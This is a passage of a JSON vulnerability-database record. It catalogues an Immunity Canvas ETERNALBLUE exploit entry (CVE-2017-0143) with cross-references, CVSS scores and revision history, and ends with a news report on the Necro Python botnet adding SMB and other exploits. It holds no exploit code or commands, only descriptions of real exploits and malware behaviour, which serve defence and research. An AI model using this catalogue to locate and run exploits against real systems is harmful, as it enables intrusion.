"SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": 
["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143"]}, {"type": "canvas", "idList": ["ETERNALBLUE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}], "modified": "2021-07-28T14:33:36", "rev": 2}, "score": {"value": 8.3, "vector": "NONE", "modified": 
"2021-07-28T14:33:36", "rev": 2}}, "objectVersion": "1.6", "scheme": null, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}}, {"id": "ETERNALBLUE", "bulletinFamily": "exploit", "title": "Immunity Canvas: ETERNALBLUE", "description": "**Name**| ETERNALBLUE \n---|--- \n**CVE**| CVE-2017-0143 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| ETERNALBLUE \n**Notes**| CVE Name: CVE-2017-0143 \nVENDOR: Microsoft \nNOTES: Due to the complexity of the bug, this exploit will never be 100% reliable. Please READ THE EXPLOIT SOURCE for more information and notes. 
\nVersionsAffected: \nRepeatability: One shot (on failure BSoD might be followed by a reboot, giving opportunity to try again) \nMSADV: MS17-010 \nReferences: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 \nDate public: 03/16/2017 \nCVSS: 9.3 \n\n", "published": "2017-03-17T00:59:00", "modified": "2017-03-17T00:59:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ETERNALBLUE", "reporter": "Immunity Canvas", "references": [], "cvelist": ["CVE-2017-0143"], "type": "canvas", "lastseen": "2021-07-28T14:33:11", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "**Name**| ETERNALBLUE \n---|--- \n**CVE**| CVE-2017-0143 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| ETERNALBLUE \n**Notes**| CVE Name: CVE-2017-0143 \nVENDOR: Microsoft \nNOTES: Due to the complexity of the bug, this exploit will never be 100% reliable. Please READ THE EXPLOIT SOURCE for more information and notes. 
\nVersionsAffected: \nRepeatability: One shot (on failure BSoD might be followed by a reboot, giving opportunity to try again) \nMSADV: MS17-010 \nReferences: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 \nDate public: 03/16/2017 \nCVSS: 9.3 \n\n", "edition": 3, "enchantments": {"dependencies": {"modified": "2019-05-29T19:48:21", "references": [{"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", 
"THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2019-05-29T19:48:21", "rev": 2, "value": 7.8, "vector": "NONE"}}, "hash": "552ae87accf32feabdbe0d80cf84b21bc0069a8bb27144e006e5428b1f45b216", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "modified"}, {"hash": 
"d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "fcc790c72a86190de1b549d0ddc6f55c", "key": "type"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "c32f9a5d9de00e1a1587ad7b40285fd0", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "403ed403becfd91e34c7d282e2a3b12f", "key": "reporter"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "23ade5ff03698910f687eabbc702a4a8", "key": "title"}, {"hash": "5c497684e7b982e9f41e89081d72ea17", "key": "description"}], "history": [], "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ETERNALBLUE", "id": "ETERNALBLUE", "immutableFields": [], "lastseen": "2019-05-29T19:48:21", "modified": "2017-03-17T00:59:00", "objectVersion": "1.5", "published": "2017-03-17T00:59:00", "references": [], "reporter": "Immunity Canvas", "title": "Immunity Canvas: ETERNALBLUE", "type": "canvas", "viewCount": 991}, "different_elements": ["cvss3", "cvss2"], "edition": 3, "lastseen": "2019-05-29T19:48:21"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "**Name**| ETERNALBLUE \n---|--- \n**CVE**| CVE-2017-0143 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| ETERNALBLUE \n**Notes**| CVE Name: CVE-2017-0143 \nVENDOR: Microsoft \nNOTES: Due to the complexity of the bug, this exploit will never be 100% reliable. Please READ THE EXPLOIT SOURCE for more information and notes. 
\nVersionsAffected: \nRepeatability: One shot (on failure BSoD might be followed by a reboot, giving opportunity to try again) \nMSADV: MS17-010 \nReferences: http://www.microsoft.com/technet/security/Bulletin/MS08-001.mspx \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 \nDate public: 03/16/2017 \nCVSS: 9.3 \n\n", "edition": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "b0e90c3122f73836223b10ea3ff9ec2bc689ed0b4b16f8d9fb819566bde3d3ab", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "f2261f338fd984f44c0d57addcdd12eb", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "fcc790c72a86190de1b549d0ddc6f55c", "key": "type"}, {"hash": "c32f9a5d9de00e1a1587ad7b40285fd0", "key": "href"}, {"hash": "0e9da813b8998d01d6d214be3da05aa6", "key": "description"}, {"hash": "403ed403becfd91e34c7d282e2a3b12f", "key": "reporter"}, {"hash": "f2261f338fd984f44c0d57addcdd12eb", "key": "published"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "23ade5ff03698910f687eabbc702a4a8", "key": "title"}], "history": [], "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ETERNALBLUE", "id": "ETERNALBLUE", "lastseen": "2018-02-28T23:28:19", "modified": "2017-03-16T20:59:03", "objectVersion": "1.3", "published": "2017-03-16T20:59:03", "references": [], "reporter": "Immunity Canvas", "title": "Immunity Canvas: ETERNALBLUE", "type": "canvas", "viewCount": 315}, "differentElements": ["description"], "edition": 1, "lastseen": "2018-02-28T23:28:19"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "**Name**| ETERNALBLUE \n---|--- \n**CVE**| CVE-2017-0143 \n**Exploit Pack**| 
[CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| ETERNALBLUE \n**Notes**| CVE Name: CVE-2017-0143 \nVENDOR: Microsoft \nNOTES: Due to the complexity of the bug, this exploit will never be 100% reliable. Please READ THE EXPLOIT SOURCE for more information and notes. \nVersionsAffected: \nRepeatability: One shot (on failure BSoD might be followed by a reboot, giving opportunity to try again) \nMSADV: MS17-010 \nReferences: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 \nDate public: 03/16/2017 \nCVSS: 9.3 \n\n", "edition": 2, "enchantments": {"dependencies": {"modified": "2018-11-01T14:03:35", "references": [{"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": 
["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}]}, "score": {"value": 5.0, "vector": "NONE"}}, "hash": "4401033752458d8a3fa014fc0e369a264b1a5af006cd629595ef0dd9653da4e8", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "f2261f338fd984f44c0d57addcdd12eb", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "fcc790c72a86190de1b549d0ddc6f55c", "key": "type"}, {"hash": "c32f9a5d9de00e1a1587ad7b40285fd0", "key": "href"}, {"hash": "403ed403becfd91e34c7d282e2a3b12f", "key": "reporter"}, {"hash": "f2261f338fd984f44c0d57addcdd12eb", "key": "published"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "23ade5ff03698910f687eabbc702a4a8", "key": "title"}, {"hash": "5c497684e7b982e9f41e89081d72ea17", "key": "description"}], "history": [], "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ETERNALBLUE", "id": "ETERNALBLUE", "lastseen": "2018-11-01T14:03:35", 
"modified": "2017-03-16T20:59:03", "objectVersion": "1.3", "published": "2017-03-16T20:59:03", "references": [], "reporter": "Immunity Canvas", "title": "Immunity Canvas: ETERNALBLUE", "type": "canvas", "viewCount": 810}, "differentElements": ["cvss", "published", "modified"], "edition": 2, "lastseen": "2018-11-01T14:03:35"}], "edition": 4, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "67164609e54a9c48368f8c8211098c3c"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "5c497684e7b982e9f41e89081d72ea17"}, {"key": "href", "hash": "c32f9a5d9de00e1a1587ad7b40285fd0"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "f54a01beedb777f2ca261ddba30cf1a5"}, {"key": "published", "hash": "f54a01beedb777f2ca261ddba30cf1a5"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "403ed403becfd91e34c7d282e2a3b12f"}, {"key": "title", "hash": "23ade5ff03698910f687eabbc702a4a8"}, {"key": "type", "hash": "fcc790c72a86190de1b549d0ddc6f55c"}], "hash": "ea0d7d7d5484cccead344e59f84d63cd6d995f8aa84f81c51738fc1fa53bb9e8", "viewCount": 992, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "threatpost", "idList": 
["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "canvas", "idList": ["MS17_010"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", 
"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2021-07-28T14:33:11", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-07-28T14:33:11", "rev": 2}}, "objectVersion": "1.6", "scheme": null, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}}], "thn": [{"id": "THN:FF56343C15BACA1C1CE83A105EFD7F77", "hash": "8df263a3af7e3cb4e5c145e7ae7a31c1", "type": "thn", "bulletinFamily": "info", "title": "Necro Python Malware Upgrades With New Exploits and Crypto Mining Capabilities", "description": "[![Necro Python 
bot](https://thehackernews.com/images/-xLbunA9yK10/YLkJxMO-Q1I/AAAAAAAACvM/nmCtDmIhZswOE5N0nip4wXOkRMetd8YbACLcBGAsYHQ/s728-e1000/Necro-Python-bot.jpg)](<https://thehackernews.com/images/-xLbunA9yK10/YLkJxMO-Q1I/AAAAAAAACvM/nmCtDmIhZswOE5N0nip4wXOkRMetd8YbACLcBGAsYHQ/s0/Necro-Python-bot.jpg>)\n\nNew upgrades have been made to a Python-based \"self-replicating, polymorphic bot\" called Necro in what's seen as an attempt to improve its chances of infecting vulnerable systems and evading detection.\n\n\"Although the bot was originally discovered earlier this year, the latest activity shows numerous changes to the bot, ranging from different command-and-control (C2) communications and the addition of new exploits for spreading, most notably vulnerabilities in VMWare vSphere, SCO OpenServer, Vesta Control Panel and SMB-based exploits that were not present in the earlier iterations of the code,\" researchers from Cisco Talos [said](<https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html>) in a deep-dive published today.\n\n[![password auditor]()](<https://go.thn.li/1-728-5> \"password auditor\" )\n\nSaid to be in development as far back as 2015, [Necro](<https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph>) (aka N3Cr0m0rPh) targets both Linux and Windows devices, with heightened activity observed at the start of the year as part of a malware campaign dubbed \"[FreakOut](<https://thehackernews.com/2021/01/freakout-ongoing-botnet-attack.html>)\" that was found exploiting [vulnerabilities](<https://blog.netlab.360.com/necro/>) in network-attached storage (NAS) devices running on [Linux machines](<https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/>) to co-opt the machines into a botnet for launching distributed denial-of-service (DDoS) attacks and mining Monero cryptocurrency.\n\nIn addition to its DDoS and RAT-like functionalities to download and launch additional payloads, 
Necro is designed with stealth in mind by installing a rootkit that hides its presence on the system. What's more, the bot also injects malicious code to retrieve and execute a JavaScript-based miner from a remote server into HTML and PHP files on infected systems.\n\n[![Necro Python bot](https://thehackernews.com/images/-T11tz54OU8s/YLkIvEIHiHI/AAAAAAAACvE/w9Z7XokXIogZ_cJ0mnmknp_iSRaHFNCYgCLcBGAsYHQ/s728-e1000/hacking-malware.jpg)](<https://thehackernews.com/images/-T11tz54OU8s/YLkIvEIHiHI/AAAAAAAACvE/w9Z7XokXIogZ_cJ0mnmknp_iSRaHFNCYgCLcBGAsYHQ/s0/hacking-malware.jpg>)\n\nWhile previous versions of the malware exploited flaws in Liferay Portal, Laminas Project, and TerraMaster, the latest variants observed on May 11 and 18 feature command injection exploits targeting Vesta Control Panel, ZeroShell 3.9.0, SCO OpenServer 5.0.7, as well as a remote code execution flaw impacting VMWare vCenter ([CVE-2021-21972](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>)) that was patched by the company in February.\n\nA version of the botnet, released on May 18, also includes exploits for [EternalBlue](<https://thehackernews.com/2017/04/windows-hacking-tools.html>) (CVE-2017-0144) and [EternalRomance](<https://www.microsoft.com/security/blog/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) (CVE-2017-0145), both of which abuse a remote code execution vulnerability in Windows SMB protocol. 
